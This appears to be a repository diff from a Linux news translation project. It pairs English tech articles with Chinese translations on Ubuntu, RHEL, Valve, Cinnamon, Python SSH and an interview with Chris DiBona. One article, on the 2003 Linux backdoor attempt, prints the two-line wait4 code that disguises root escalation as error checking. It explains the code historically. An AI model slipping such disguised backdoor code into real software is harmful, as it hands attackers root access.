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synced 2025-03-24 02:20:09 +08:00
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**Ubuntu设计师Mika Meskanen**在[推特][1]上分享了Ubuntu 13.10版默认壁纸的一个有趣的变化,通过一个更素雅的金属感来过滤Saucy默认壁纸。
**Ubuntu设计师Mika Meskanen**在推特上[分享][1]了Ubuntu 13.10版默认壁纸的一个有趣的变化,通过滤镜把默认的Saucy壁纸变成更加素雅的金属质感。

这张分辨率为2560x1600像素,大小为2.7MB的壁纸现在可以从这里下载到: [http://farm3.staticflickr.com/2831/9950159855_fa8077e928_o.png][2]
via: http://iloveubuntu.net/add-metallic-variation-saucys-default-wall-aqua-graphite-wallpaper
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[译者ID][markvv] 校对:[Caroline][]
译者:[markvv][] 校对:[Caroline][]
@ -0,0 +1,63 @@
Open source is brutal: an interview with Google's Chris DiBona

Image by opensource.com
Chris DiBona is the Director of Open Source for Google. He is also one of the great champions of open source, dating back to when he first fell in love with Linux at his university.
At the All Things Open conference this year, Chris will give an update on Google's current open source software activities and a retrospective, of sorts, on the origins and state of Android.
I caught up with him to discuss his favourite Linux distribution, the brutal nature of open source, and his view of Google's responsibilities as an industry leader.
Read more in this interview.
What's something we don't know about your path to Google and working with open source?
> I first used Linux while I was at school, as we needed to write some client/server stuff for the operating systems class I was taking. Fortuitously for me, the Sun workstation lab was crowded, very hot due to poor ventilation, smelly (coder odor), and the terminals were very very slow. I figured, what the heck, let's give this Linux thing a shot on a 486-16 I had lying around at home. Best decision ever. I fell in love with the Linux OS. It was so great, fast, and feature-full even back then compared to other unixes. I got an A in the OS class, too.
A question almost as dangerous as asking about your favourite sports team; what's your favourite Linux distribution?
> Ha! A flip answer would be Android as that's the device with a Linux kernel that I use more than anything else by two orders of magnitude, though most people don't consider it a distribution in the common way we talk about them. I'm typing the reply to this question on Chrome running on a Ubuntu/Debian derivative. I'm running a Debian instance on Google compute engine and I have a Fedora machine at home that I use from time to time. I carry a Chomebook around for most of my presentations and feel it's probably the most secure machine I own.
> Favorite though? Android.
You spent a long time working with open source and Linux before moving to Google in 2004. What made you want to work with Google?
> When I decided to return to full time work after a brief period consulting, Google's offer was the strongest and the most interesting to me. The idea of being able to be Google's 'open source person' and to build the effort from scratch was deeply appealing to me. I also felt that Google was (and is) still doing really interesting computer science and that appealed to me in ways that the other offers didn't.
Not only do you mentor and consult on a variety of different projects, you're also involved with Google Ventures, helping to fund startups, so what is it that you look for in a project? What makes you say: "Yes, I want to help you"?
> Well, honestly, I am mostly looking for it to be interesting. For Google Ventures, I am not really in the deal flow so much as I'm brought in on open source issues (which are interesting and legion).
In an interview a few years ago you said, "Google works with the open source community. Sponsorship implies stewardship, and that's a pretty serious thing." Does Google hope to avoid stewardship in the communities it's involved in? Are the two inextricably linked?
> I think so. I would rather Google engineers and non-google open source engineers see each other as peers in computer science. We do realize that our broad funding of open source projects can imply stewardship like control of projects, but you know, that's how it goes even if that sort of thing doesn't really correlate.
You once called open source “brutal”. What did you mean by that?
> Well, I think I was asked why open source works and when you think about how software engineering management works in industry, it shouldn't. Disparate, distributed, non-homogenous teams are extremely difficult to run in a company, but in open source it creates some world-class terrific software. Why is that?
> I think that it is because open source projects are able to only work with the productive people and ignore everyone else. That behavior can come across as very harsh or exclusionary, and that's because it is that: brutally harsh and exclusionary of anyone who isn't contributing.
> This is why project forking is so important. If a person is rejected from a project for whatever reason, they can fork and take the project in a new direction, and if their ideas and execution is superior to the primary project, that fork becomes the new reality and those people that rejected that developer are now the rejected.
> So, I guess what I'm saying is that survival of the fittest as practiced in the open source world is a pretty brutal mechanism, but it works very very well for producing quality software. Boy is it hard on newcomers though...
Fourteen years ago, you edited an O'Reilly book about open source. Has the landscape of open source changed much in those years? Do you think open source will overtake the proprietary model in the future?
> The landscape has changed a bit, with the notable demographic difference being that we've seen a growth in the number of people in companies working on open source, and I perceive a slight decline in open source participation in the academy, which I blame on the tech-transfer/bayh-dole patenting process being a real barrier to code licensing. Similarly, some open source coming out of universities and companies simply isn't open source enough as there is a fair amount of side dealing going around on around patents. I'm tempted to say that if it isn't a patent granting license, you should be suspicious, but that's probably a bit extreme a position to take at this time.
via: https://opensource.com/business/13/10/interview-chris-dibona
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sources/The Linux Backdoor Attempt of 2003.md
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sources/The Linux Backdoor Attempt of 2003.md
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The Linux Backdoor Attempt of 2003
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
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@ -1,26 +0,0 @@
Ubuntu Touch: Ubuntu OS for Smartphone is Almost Ready
The Ubuntu Touch operating system will be available for supported devices (Galaxy Nexus, Nexus 4, Nexus 7, and Nexus 10). This operating system now has a planned release date of **October 17th**.
> “As of today, we are exactly one month away from the release of Saucy Salamander. As part of that release, ubuntu is committed to delivering an image of ubuntu-touch, ready to install on supported devices. If you have a device, I would encourage you to join this effort! Everything you need to know can be found upon this wiki page. You’ll need a nexus device and a little time to spend with the latest image. If you find a bug, report it! The wiki has links to help.”
a Canonical employee writes on his blog.
Do you own a nexus device? If yes, you are the perfect person to help these guys to make the ubuntu touch images the best. Even if you do not own a nexus device, you can still help and contribute by creating automated tests for fixed bugs so they don’t occur again. Sharing is caring! It is the only way to make the world a better place.
Nicholas Skaggs also writes that qa team is committing to test each of the stable images released and do exploratory testing against new features and specific packagesets. You can read more about his post here.
Ubuntu has introduced its own display server, Mir, which replaces the venerable and slow X Window. Canonical is also extending Ubuntu dash search as well, offering its users perform local search in Facebook, Yelp, Google Drive and dozens of other services as well.
via: http://www.unixmen.com/ubuntu-touch-ubuntu-os-smartphone-almost-ready/
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@ -1,56 +0,0 @@
Use Python To SSH To Your Machine
It is time for some python programming. I love automating stuff and this time I will show you guys how to connect to your machine via **ssh using python** and run command on it. It is not hard, but at the same time not very easy to do this in python, since there are many modules and libraries to do this task. Are you curious about the module we will use in this tutorial?
We will use pxssh class of the pexpect module in Python which is used to to take care of some of the automation needs, like ssh and ftp. Do you want to make your sysadmin lifestyle as easy as possible? Then, why don’t you focus on this tutorial and try to learn as much as possible? Ok ,ok, i got your attention now, so let me give you guys a simple description about pxssh. You can also get information about pxssh by typing help(pxssh) after importing it in a python interactive shell.
**Pxssh Description**
Pxssh is based on pexpect. It’s class extends pexpect.spawn to specialize setting up SSH connections. I use pxssh frequently for making ssh connections in python. Pxssh uses the shell prompt to synchronize output from the remote host. In order to make this more robust it sets the shell prompt to something more unique than just $ or #. This should work on most Borne/Bash or Csh style shells.
You can read more about pxssh [here][1].
Now let the fun begin.
In the first step, we import everything we need and assign machine details to variables like shown in Figure 1.

Figure 1
Then we create a function which will use pxssh to create and start a connection with the ssh server.

Figure 2
Study carefully how we use try and except so we can handle errors. Read more about error handling in python here.
What is the next step?
The next step is to create a function which will send the command to the machine after the ssh connection between two machines is established.

Figure 3

Figure 4
Now close the file and save it. It is ready to run.
via: http://www.unixmen.com/use-python-ssh-machine/
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Red Hat Enterprise Linux 6.5 Beta Can Remotely Control Windows 8
**Red Hat has announced the availability of Red Hat Enterprise Linux 6.5 Beta for all the customers and partners.**

Red Hat Enterprise Linux 6.5 includes numerous updates for the existing features set and provides new functionalities in the areas of Subscription Management Services, scalability, networking, storage, virtualization, and security.
“To keep pace with the demand for enterprise-class infrastructure, the newest version of the leading Linux platform extends its scalability and manageability to aid in the build-out and control of large, complex IT environments.”
“For example, Red Hat Enterprise Linux 6.5 will be designed to simplify the operation of mission-critical SAP applications by automating the optimal configuration of common SAP deployments,” reads the official [announcement][1].
According to the release notes, Red Hat Enterprise Linux is fully integrated with subscription management services, which is very useful in managing the local system and its allocated subscriptions.
The developers from Red Hat also inform us that Kernel dump files on large systems can now scale to multiple terabytes of data. With the help of a new compression algorithm (LZO) that is used to speed the creation of dump files, the time needed for crash dump generation has been shortened.
One of the most interesting features of Red Hat Enterprise Linux 6.5 Beta is its ability to remotely operate Windows 7 and Windows 8 desktops and Windows Server 2012 consoles using the RDP protocol.
Also, the LibreOffice package has been updated to the 4.0 branch, which is actually a nice surprise given the well-known fact that Red Hat only uses time-proven applications and that devs are extremely cautious with what they are adopting for the next release.
The complete release notes can be found in the official announcement.
**You can also review and purchase the Red Hat Enterprise Linux 6.5 Beta:**
- [Red Hat Enterprise Linux 6.4][2] (Registration Required)[iso] [0 KB]
- [Red Hat Enterprise Linux 6.5 Beta][3] (Registration Required)[iso] [0 KB]
via: http://news.softpedia.com/news/Red-Hat-Enterprise-Linux-6-5-Beta-Can-Control-Windows-8-Installations-389761.shtml
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@ -1,15 +1,15 @@
在Ubuntu中安装Cinnamon 1.8
Cinnamon是Linux Mint团队最初为[Linux Mint][4]开发的桌面环境。这个桌面环境提供给用户一个更舒适和现代的感受。
Cinnamon是由[Linux Mint][4]团队最初为Linux Mint开发的一款桌面环境。它提供给用户一个更舒适和现代化的体验。
最新版本的Cinnamon 1.8在Ubuntu仓库尚未公布,因此我们要感谢PPA。
一些新的功能已经被包括在Cinnamon,包括 Screensaver(屏幕保护程序),Cinnamon Control Center(Cinnamon控制中心)和[更多][5].
Cinnamon1.8包含了这些新功能,包括 Screensaver(屏幕保护程序),Cinnamon Control Center(Cinnamon控制中心)[等等][5].
@ -21,7 +21,7 @@ Cinnamon是Linux Mint团队最初为[Linux Mint][4]开发的桌面环境。这
点击 **登录界面** 你的 **用户名** **Ubuntu logo** 的 **右上角** 。你应该能看到 **Cinnamon** 和其他桌面环境。
点击你 **用户名右上角** 的**Ubuntu** 图标。你应该能看到 **Cinnamon** 和其他桌面环境。
选择 **Cinnamon** 并登录。
@ -29,7 +29,7 @@ Cinnamon是Linux Mint团队最初为[Linux Mint][4]开发的桌面环境。这

查看Cinnamon 1.8桌面与打开的菜单。
查看已打开菜单的Cinnamon 1.8桌面。
@ -37,12 +37,12 @@ via: http://www.unixmen.com/install-cinnamon-1-8-ubuntu-13-04/
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译者:[Vito][] 校对:[校对者ID][]
译者:[Vito][] 校对:[Caroline][]
@ -0,0 +1,36 @@
RHEL6.5 Beta版支持过程控制Windows 8系统
Red Hat已经宣布向所有客户和合作伙伴发布RHEL6.5 Beta版本。
RHEL6.5包含对已有特性的各种升级,以及在订阅管理服务(Subscription Management Services)、可扩展性(scalability)、网络、存储、虚拟化、安全等方面提供新的功能。
> 为了跟上企业级架构的要求,最新版本提升了其可扩展性和易管理性的能力,以满足企业在横向扩展(build-out)的需求和管理庞大复杂的IT环境的需求。
> 举个例子,RHEL6.5通过优化SAP的配置,从而简化了对关键性业务SAP的操作。
Red Hat的开发人员介绍,用于记录内核崩溃信息的Kernel dump文件最大可以达到几个TB。用新的LZO压缩算法,RHEL能更快地产生Kernel dump文件。
最NB的功能之一是:RHEL6.5可以远程控制Win7/Win8/Win Server 2012,使用的是RDP(Remote Desktop Protocol,远程桌面协议)。
完整的release note可查看官方文档。
via: http://news.softpedia.com/news/Red-Hat-Enterprise-Linux-6-5-Beta-Can-Control-Windows-8-Installations-389761.shtml
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译者:[chenjintao_ii][] 校对:[校对者ID][]
@ -0,0 +1,28 @@
Ubuntu Touch: Ubuntu手机OS已经准备就绪
Ubuntu Touch 操作系统首批支持设备(Galaxy Nexus, Nexus 4, Nexus 7, and Nexus 10).并将于10月17日发布正式版.
> “截至今日,我们正好发布Saucy Salamand(13.04)一个月.作为那次发布的一部分,ubuntu承诺发布ubuntu-touch镜像文件,准备安装Ubuntu Touch在可行的设备.如果你有这样的设备,我将鼓励你加入这次的体验!你想知道任何信息都能在这个wiki页中找到.你需要一个nexus设备和一些时间花费在最新的镜像上.如果你发现了bug,请报告它!wiki中有帮助链接”
你有nexus设备吗?如果是,那么你将是最适合的人去帮助这些家伙将ubuntu-touch images制作的更好.即使你没有nexus设备,你也能通过bug修复的自动测试来帮助他们.分享就是关爱!这是创造幸福世界的惟一途径.
Nicholas Skaggs 也写给致力于测试每一个稳定发行版和针对新特征,特殊包集合的探索性测试的高级测试工程师.你可以在他公布处查看更多信息
Ubuntu 已经介绍了他自己的显示服务器,Mir,他将替换受人尊敬但缓慢的X window.此外Canonical 也扩展了Ubuntu dash search,提供给用户从Facebook,Yelp,Google Drive获取本地搜索相关信息和其他几十种服务.
via: http://www.unixmen.com/ubuntu-touch-ubuntu-os-smartphone-almost-ready/
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译者:[星誓云梦][] 校对:[校对者ID][]
translated/Use Python To SSH To Your Machine.md
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translated/Use Python To SSH To Your Machine.md
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@ -0,0 +1,57 @@
是时间写点python代码了.我爱自动化的东西,这个时候我将告诉大家怎么通过**ssh using python**和命令连接你的机器.这不难,但是用python来做也不是很简单,因为要用很多模块和库来完成这个任务. 你是不是很好奇本教程将会使用什么模块?
**Pxssh 描述**
Pxssh 基于pexpect.它的类扩展pexpect.spawn专门用来设置SSH连接.我经常使用python的pxssh进行ssh连接. Pxssh 使用shell命令提示从远程主机来同步输出.为了使这更牛x把shell提示符设置的更独特的一点,不仅仅用$或#.这应该可以在大多数Borne/bash或csh shell上工作.

图解 1

图解 2

图解 3

图解 4
现在关闭文件并保存它. 现在它已经准备好可以运行了.
via: http://www.unixmen.com/use-python-ssh-machine/
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译者:[flsf][] 校对:[校对者ID][]
@ -1,42 +1,48 @@
Valve 在星期一揭露进军Linux的首要计划
仅仅在Gabe Newell暗示可能在下周揭露蒸汽盒几天之后,[Valve软件在星期五发送了这条链接][1]声明表示,蒸汽宇宙会在2014年进行扩展。在标题下方放置的是一个大屏的HDTV和一个炫目的网站门户--背景看起来像一个兰黑色的眼,在其下方有三个较小的门户,其中一个有一个倒计时器(在写这边报道时还剩71个小时)
[在本周前几天的新奥尔良的LinuxCon会议中][2],Gabe Newell说道,Linux将是PC游戏的未来,因为不会再有封闭的网络;开源环境最终会为PC游戏玩家提供提供便宜的游戏平台,因为没有了附加的操作系统成本。在开放环境下更新也不再是问题--他指出一款应用的更新仅仅通过Apple的批准就需要花费6个月的时间。
他指出将蒸汽机领入Linux“是给我我们开发合作伙伴的一个信号来说明我们关于Linux事项的讨论是真正严肃的。” 公司同样也为LLDB调试器做出了贡献而且共同开发了另外一个调试器。当前,[Linux游戏帐号还少于市场份额的1%][3],包括游戏玩家数、游戏时间和收益。Valve想要改变这一状况。
via: http://www.tomshardware.com/news/valve-gabe-newell-steam-box-linux-monday,24342.html
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译者:[theo-l][] 校对:[校对者ID][]
Valve 星期一揭示进军Linux的首要工作
仅仅在Gabe Newell暗示可能在下周揭示 Steam Box 几天之后,[Valve软件在星期五发送了这条链接][1]表示,Steam Universe 会在2014年进行扩展。在标题下方放置的是一个大屏的HDTV和一个炫目的网站门户--背景看起来像一个深蓝色的眼,在其下方有三个较小的门户,其中一个有一个倒计时器(在写这篇报道时还剩71个小时)
“去年,我们发布了一个软件特征称作大屏幕,是一款为电视机和游戏控制器定制的用户接口,”这家公司表示,“今年,我们一直在努力找到更多方法来满足那些想把 Steam 搬到客厅的用户的需求。
我们很快就将让您加入到我们的设计过程中,让您来帮助我们构建 Steam 的未来。”
Valve在邮件中说道,公司将谈到为促使 Steam 在电视机和客厅更易访问而正在进行的一系列步骤。根据网站第一个门户上的倒计时,首份通告会在星期一上午发布。也就是说,收藏这个链接以便在下周伊始可以看到公司店里有什么稀奇事物。
[在本周前几天的新奥尔良的LinuxCon会议中][2],Gabe Newell说道,Linux将是PC游戏的未来,因为不会再有封闭的网络;开源环境最终会为PC游戏玩家提供提供便宜的游戏平台,因为没有了附加的操作系统成本。在开放环境下升级也不再是问题--他指出 Apple 批准一款APP 升级就需要花费6个月的时间。
二月份 Valve 发行了一款单机版 Linux客户端,并添加了198个游戏到其Linux库中,充分证明了Valve 对 Linux 的尽心尽力。然而,Newell演示了在客厅Linux是怎样利消除带专有软件的硬件的复杂性的,暗示了基于Linux的 Stream Box 的可能性。游戏玩家希望他们的系统简单而且不会长期固定在特定的硬件上。
他指出将 Steam 领入Linux“是给我们的开发合作伙伴的一个信号,说明我们对正在讨论的 Linux 事项是认真的。” 公司同时还在为LLDB调试器项目提供资金,并且正合作开发另外一个调试器。当前,[Linux游戏帐号还少于市场份额的1%][3],包括游戏玩家数、游戏时间和收益。Valve想要改变这一状况。
围绕 Sream Box 的谣言集中在用户在必要的时候更新设备的能力,也是每个人确信Xi3公司的 Piston 是一款优秀设备的原因。但是了解这两家公司的人说在2013年1月电子产品展期间他们的关系结束了,留下我们猜想支持Valve 平台的将是什么。不过这家公司已经在过去声明了几次, Stream Box不会是一个特定硬件集合,而是更像是来自合作伙伴的多种硬件解决方案的认证方案。
via: http://www.tomshardware.com/news/valve-gabe-newell-steam-box-linux-monday,24342.html
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